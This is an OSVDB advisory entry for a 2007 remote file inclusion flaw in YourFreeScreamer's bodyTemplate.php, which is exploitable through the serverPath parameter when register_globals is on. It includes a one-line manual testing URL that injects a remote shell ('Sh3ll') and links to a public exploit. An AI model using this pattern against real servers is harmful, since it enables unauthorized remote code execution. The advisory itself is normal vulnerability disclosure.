YourFreeScreamer templates/2blue/bodyTemplate.php serverPath Variable Remote File Inclusion

2007-06-17T00:00:00
ID OSVDB:36891
Type osvdb
Reporter OSVDB
Modified 2007-06-17T00:00:00

Description

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Manual Testing Notes

http://[target]/[path]/templates/2blue/bodyTemplate.php?serverPath=Sh3ll ?

References:

Secunia Advisory ID:25728 Other Advisory URL: http://milw0rm.com/exploits/4075 ISS X-Force ID: 34927 FrSIRT Advisory: ADV-2007-2241 CVE-2007-3271 CVE-2007-3315 Bugtraq ID: 24500